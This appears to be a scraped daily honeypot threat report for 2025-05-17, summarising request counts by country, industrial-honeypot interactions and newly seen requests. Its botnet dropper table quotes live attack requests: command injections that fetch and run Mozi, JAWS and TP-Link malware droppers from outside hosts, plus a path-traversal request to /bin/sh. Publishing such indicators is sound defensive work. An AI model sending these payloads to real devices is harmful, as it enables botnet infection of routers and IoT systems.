Table of Contents

Daily Report: 2025-05-17
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 7 new requests that have never been observed before (these were added to the monitored request database.).

A total of 889 requests were recorded during the day, originating from 4 different countries, with a peak of 206 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
SG	Germany
US	Germany
KR	Germany
US	Dubai
FR	Israel
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
120.138.12.245	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
201.110.226.12	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
27.215.87.190	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
141.98.11.137	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
74	2	POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1
205	1	\x00\x11Clickhouse client\x18\x0C\xCA\xA9\x03\x00\x07default\x00
228	1	\x00\x00\x00T\x00\x03\x00\x00user\x00postgres\x00database\x00postgres\x00application_name\x00psql\x00client_encoding\x00UTF8\x00\x00
268	1	GET /socket.io/1/?t=1747451036116 HTTP/1.1
345	1	GET /Odin/http/call1747468019 HTTP/1.1
346	1	GET /OdinHttpCall1747468019 HTTP/1.1
348	1	GET /odinhttpcall1747468019 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	206	US
1	78	NL
2	74	CN
3	70	PL
4	66	CH
5	58	DE
6	45	BG
7	40	FR
8	34	GB
9	33	JP
10	28	UA
11	28	IN
12	26	SC
13	13	SG
14	13	IL
15	13	LT
16	11	AZ
17	9	CA
18	7	KR
19	7	RO
20	6	GH
21	4	BE
22	3	AO
23	3	MC
24	3	IR
25	3	HK
26	1	MX
27	1	IT
28	1	BR
29	1	ZA
30	1	ES
31	1	PT
32	1	PH
33	1	TR

Report: 2025-05-16

16 May 2025·1581 words

Repport Daily

Report: 2025-05-15

15 May 2025·368 words

Repport Daily

Report: 2025-05-14

14 May 2025·403 words

Repport Daily

	number_of_occurence	country_iso_code
0	206	US
1	78	NL
2	74	CN
3	70	PL
4	66	CH
5	58	DE
6	45	BG
7	40	FR
8	34	GB
9	33	JP
10	28	UA
11	28	IN
12	26	SC
13	13	SG
14	13	IL
15	13	LT
16	11	AZ
17	9	CA
18	7	KR
19	7	RO
20	6	GH
21	4	BE
22	3	AO
23	3	MC
24	3	IR
25	3	HK
26	1	MX
27	1	IT
28	1	BR
29	1	ZA
30	1	ES
31	1	PT
32	1	PH
33	1	TR

	number_of_occurence	country_iso_code
0	206	US
1	78	NL
2	74	CN
3	70	PL
4	66	CH
5	58	DE
6	45	BG
7	40	FR
8	34	GB
9	33	JP
10	28	UA
11	28	IN
12	26	SC
13	13	SG
14	13	IL
15	13	LT
16	11	AZ
17	9	CA
18	7	KR
19	7	RO
20	6	GH
21	4	BE
22	3	AO
23	3	MC
24	3	IR
25	3	HK
26	1	MX
27	1	IT
28	1	BR
29	1	ZA
30	1	ES
31	1	PT
32	1	PH
33	1	TR

Daily Report: 2025-05-17#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-05-17
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	206	US
1	78	NL
2	74	CN
3	70	PL
4	66	CH
5	58	DE
6	45	BG
7	40	FR
8	34	GB
9	33	JP
10	28	UA
11	28	IN
12	26	SC
13	13	SG
14	13	IL
15	13	LT
16	11	AZ
17	9	CA
18	7	KR
19	7	RO
20	6	GH
21	4	BE
22	3	AO
23	3	MC
24	3	IR
25	3	HK
26	1	MX
27	1	IT
28	1	BR
29	1	ZA
30	1	ES
31	1	PT
32	1	PH
33	1	TR